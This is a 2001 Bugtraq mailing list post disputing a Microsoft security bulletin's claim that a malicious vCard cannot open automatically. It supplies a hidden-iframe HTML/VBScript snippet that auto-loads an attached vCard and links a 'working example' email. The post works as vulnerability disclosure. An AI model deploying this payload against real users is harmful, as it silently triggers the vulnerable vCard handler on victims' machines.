[19374] in bugtraq
Re: Microsoft Security Bulletin MS01-012
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Mon Feb 26 17:48:55 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <22205652.983132054934.JavaMail.imail@almond.excite.com>
Date: Sun, 25 Feb 2001 12:14:10 -0800
Reply-To: http-equiv@excite.com
From: "http-equiv@excite.com" <http-equiv@excite.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Dear Sir,
>Mitigating Factors:
>====================
> - There is no means by which a Vcard could be made to open
> automatically.
This is not entirely accurate. If you are in the habit of collecting these
odd things, you will have most certainly uncheck-marked the security warning
a long time ago. In that case it is less than trivial to open the Vcard
automatically:
<img id="Bill_Gates" SRC="cid:malware.com" style="VISIBILITY: hidden">
<IFRAME id=Compelling style="VISIBILITY: hidden">
</IFRAME>
<SCRIPT language=vbs>
document.all.item("Compelling").document.location=Bill_Gates.src
</SCRIPT>
Working example:
http://www.malware.com/crap.eml
Yours Sincerely,
Your friend and mine,
http://www.malware.com
--
_______________________________________________________
Send a cool gift with your E-Card
http://www.bluemountain.com/giftcenter/
